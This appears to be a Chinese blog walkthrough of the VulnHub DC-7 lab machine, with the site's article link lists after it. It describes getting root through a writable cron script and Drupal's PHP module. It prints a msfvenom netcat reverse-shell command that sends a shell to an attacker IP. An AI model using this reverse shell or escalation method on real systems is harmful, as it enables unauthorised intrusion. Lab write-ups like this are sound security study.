靶机下载地址:

https://www.vulnhub.com/entry/dc-7,356/

主机扫描:

http://10.10.202.161/

Google搜索下:

SSH 登录

以上分析得出:此脚本是root每三分钟执行一次,并且www-data用户具有写入权限,因此需要想办法获取此权限,进行写入shell反弹即可

https://www.digitalocean.com/community/tutorials/a-beginner-s-guide-to-drush-the-drupal-shel

 

我们点击扩展安装一个PHP的模块

https://www.drupal.org/project/php

创建基本网页,选择PHP code

写入shell

本地监听获取shell root权限

等了三分钟没shell过来,竟然没执行,这。。。。 换个方式吧

╰─ msfvenom -p cmd/unix/reverse_netcat lhost=10.10.202.159 lport=6666 R
[-] No platform was selected, choosing Msf::Module::Platform::Unix from the payload
[-] No arch selected, selecting arch: cmd from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 91 bytes
mkfifo /tmp/iwxe; nc 10.10.202.159 6666 0</tmp/iwxe | /bin/sh >/tmp/iwxe 2>&1; rm /tmp/iwxe

确认已经写入

OVER !

最新文章

  1. 【转】浅谈truncate的使用
  2. 安装自创建的windows服务。
  3. jquery mobile在页面加载时添加加载中效果 document.ready 和window.onload执行顺序比较
  4. [llvm] Call the LLVM Jit from c program
  5. 前端这条路怎么走,作为一名后端er,说说我的见解
  6. fgets读取文件时的注意事项
  7. qregularexpression和qregexp的区别
  8. hdu 4627 水数学题
  9. linux常用命令详解 (二)文件处理命令
  10. AVL树----java
  11. 如何优雅的设计Redux中的Store
  12. 深入解析FileInputStream和FileOutputStream
  13. 使用axis2开发webservices并打包到tomcat
  14. PyQt5--基础篇:用eric6工具实现三级联动效果
  15. AI应用开发实战 - 从零开始搭建macOS开发环境
  16. 计蒜客 方程的解数 dfs
  17. 【iCore4 双核心板_FPGA】例程六:触发器实验——触发器的使用
  18. 17. 判断是否IE浏览器
  19. Selenium+java上传文件
  20. 运算符重载(C++)

热门文章

  1. RPM命令执行失败:bash: rpm: 未找到命令...
  2. Webstrom怎么修改主题
  3. [ASP.NET Core 3框架揭秘] 配置[1]:读取配置数据[上篇]
  4. 在.NET Core中使用Jwt对API进行认证
  5. SpringAOP之使用切入点创建通知
  6. .NET进阶篇06-async异步、thread多线程4
  7. ansible源码安装、普通用户实现批量控制
  8. 【开发者portal在线开发插件系列一】profile和基本上下行消息
  9. Java修炼——四种方式解析XML_DOM
  10. 强化学习二:Markov Processes